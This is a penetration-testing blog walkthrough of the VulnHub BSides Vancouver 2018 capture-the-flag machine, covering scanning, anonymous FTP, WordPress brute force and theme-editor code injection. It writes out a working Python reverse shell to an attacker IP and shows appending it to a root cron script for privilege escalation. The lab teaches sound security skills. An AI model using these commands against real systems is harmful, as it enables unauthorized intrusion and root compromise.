Penetration testing

BSides Vancouver: 2018 Walkthrough

Nikhil Kumar
July 4, 2018 by
Nikhil Kumar

In this article, we will learn to solve a Capture the Flag (CTF) challenge which was posted on VulnHub by "Abatchy." This CTF is a part of BSides Vancouver series as per the information given on the VulnHub website. According to the information given in the description by the author of the challenge, this is an entry level boot2root web-based challenge. This challenge aims to gain root privilege through a web application hosted on the machine. You can use the following link to download the VM and launch it on VirtualBox:

The torrent downloadable URL is also available for this VM, which is given in the reference section at the end of this article. For those who are new to CTF challenges and are not aware of this platform, VulnHub is a well-known website for security researchers which provide users with a method to learn and practice their hacking skills through a series of challenges in a safe and legal environment.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

After downloading and running this machine on VirtualBox, we started by running the Netdiscover command to obtain the IP Address of the target machine. The command and its output can be seen in the screenshot given below:

Command Used: netdiscover

As shown in the above screenshot, we have obtained the Virtual Machine IP address, i.e., 192.168.11.3 (the Target Machine IP Address).

We will now be using 192.168.11.11 as the attacker IP address.

Please Note the Target and the Attacker machine IP address may be different depending on the network configuration.

Now we have the target machine IP; the first step is always to find out the ports and services that are available on the target machine. An Nmap full port scan is used for this purpose. This is illustrated in the screenshot below:

Command Used: nmap 192.168.11.3 –p-

After the completion of the scan, we have three open ports on the target machine. I decided to start with the HTTP port. When we open it on the browser, it shows a blank page which can be seen in the following screenshot.

After that, I ran Nikto scan on the target URL which can be seen in the screenshot as follows.

Command Used: Nikto –host http://192.168.11.3/

After waiting for a while, we got the Nikto scan result, but it did not give any positive result which could help us to go further from here. So, I decided to leave the Nikto result here and run another scan by using the dirb utility to list all the possible directories on the target machine. The scan result can be seen in the following screenshot.

Command Used: dirb http://192.168.11.3

As can be seen in the above screenshot, we only got a robots.txt in which we have received 200 response code from the server, let us run this on the browser to see the content. The screenshot for this can be seen below.

As can be seen in the above screenshot, we have got a folder name let us open this folder to see its contents. I opened this on the browser, you may see in the following screenshot.

As can be seen in the above screenshot, it is a WordPress website, and the content shows "it's not being maintained." As we are already aware that WordPress is a kind of PHP framework which releases its security updates very frequently. So, it might be possible that it may contain some vulnerability which could help us to identify a way to go further from here. We ran the WPScan which is available by default in Kali Linux. It can be seen in the screenshot given below. Apart from that, we noticed that there is a login button which can be seen in the highlighted area in the above screenshot. We will check the login page after the WPScan result.

As can be seen in the above screenshot, WPScan has been completed, and the scanner has reported many vulnerabilities, but when I closely analyzed all the identified vulnerabilities, I got to know that these vulnerabilities do not lead us to go further into the target machine. So, I leave this here.

Another thing which we got from the Nmap scan was an open FTP port 21. So, let us check if we got something from that service.

As can be seen in the above screenshot, I got a connection from the target machine on FTP port with anonymous credentials. After successfully getting the FTP connection I found that there is a public directory which contains a file user.txt.bk. I download this file form the target machine by using the PUT command, and when I opened this file, I got a few usernames. You can see the same in the screenshot given below.

After getting the username, I tried to log in on the WordPress login with some random passwords. However, it was of no luck. While interacting with the login screen, I noticed that the login page is vulnerable for User Enumeration which can help me to identify the valid username and password. It can be seen in the following screenshot.

First, I tried to log in with an abatcgy username with some random password. I got an error that "Invalid Username." It can be seen in the following screenshot.

This indicates to me that the username does not exist in the system. Then I tried with another username from the list which we got from FTP. It can be seen in the screenshot given below.

In the above screenshot, I tried to log in with john username, this time I got an error which says, "The Password you entered for the username is incorrect." It means this username is a valid username on the system. Since this login screen does not have any Captcha or Account Lockout mechanism, so I ran a dictionary-based brute force attack which can be seen in the following screenshot.

As there as very long output on the screen, so I could not take the full screenshot, but the notable point can be seen in the Error which says, "We have received an unknown response for login." You may see that in the above screenshot. So, I tried to log in on the WordPress login webpage with same username and password. This time the credentials were correct, and I could successfully login to the admin dashboard. It can be seen in the following screenshot.

So, we finally got into the admin panel of the WordPress, but the target was to get the shell access of the target machine. The easy step is to find out a PHP file and inject a shell script and take the shell access of the target system. It can be seen in the following screenshot.

As can be seen in the above screenshot, we need to first go to Appearance and then click on Editor to inject the code. It will open an edit window which can be seen in the following screenshot.

After opening the edit, I clicked on the footer.php file which shows the PHP source code in the window. So, first I added the H1 tag just to verify that our code will work. The updated h1 tag can be seen in the highlighted area and save the code by clicking on the same button at the bottom of the page.

In the above screenshot, we can see "hehe" word at the bottom of the page in bold which confirm us that we can inject the PHP code as well in the same manner. So, I added the PHP code which can be seen in the screenshot given below.

In the highlighted area we can see the PHP code, after saving the code let us try to run a system command by the URL. So, first I ran the "ls" command the output can be seen in the below screenshot.

After that I tried to run the "nc" reverses shell command to take the reverse shell of the target system but that command didn't work. After a few failure attempts, I realized that "NetCat" is not available on the target machine, but python was available. It can be seen in the following screenshot.

After that, I used the python reverse shell command to take the reverse shell of the target machine. It can be seen in the screenshot given below.

Command Used:

  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.11",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • nc –vlp 1234

Finally, we got the server shell on the target machine, but it was the limited shell. Then I ran a few commands to enumerate the basic things about the running operating system which can be seen in the following screenshot.

After getting the OS related details I tried to search the kernel exploit to get the root access of the target system, but I could not find anything useful.

While exploring the directory structure of the target server, I found some interesting information in the Cron File which can be seen in the following screenshot.

As we can see in the above screenshot that there is a cron job which is being run as a root user and is executing the code form the file "cleanup" whose path is shown in the above screenshot in the highlighted area.

After getting the file, I opened it by using the cat command. There was a script written in the file; it can be seen in the following screenshot.

We can see in the above screenshot; it is a bash script which removes all the logs from the apachd2 folder. After that, I checked the file permission which shows that the file has 777 permission and it means that we can edit this file. Since the file is being executed by the root user so if we write a script in that file, then it would get executed by the root user. So, I added the python reverse shell script at the end of the above file. It can be seen in the following screenshot.

Command Used: echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.11",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" >> cleanup

I have added the above command at the end of the file; it will initiate a reverse connection from the target system to the attacker system on port no 3434. When the cron job will execute. So, I started the Netcat tool on the attacker machine to listen to the reverse connection, and after waiting for a while, I got the reverse connection. As the cron job was running as root user, so, this time I finally got the root user to revise shell which was verified by running another command on the attacker's machine which can be seen in the following screenshot.

Now, finally, we have got the root access on the target machine. We are almost done, but the CTF will be completed after we find the Flag. The flag file should be in the root folder as per the information was given by the author of the CTF.

Become a Certified Ethical Hacker, guaranteed!

Become a Certified Ethical Hacker, guaranteed!

Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.

As you can see in the above screenshot, we have got the flag. There was only one file in the root folder, and that was the flag file. This completes this CTF. I hope you like this article and enjoyed learning this machine. I would love to answer your questions you can put them in the comments.

References:

Nikhil Kumar
Nikhil Kumar

Nikhil Kumar, a Certified Ethical Hacker, works as a Information Security Consultant. He has experience in web application pen-testing, social engineering, password cracking and android pen-testing. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.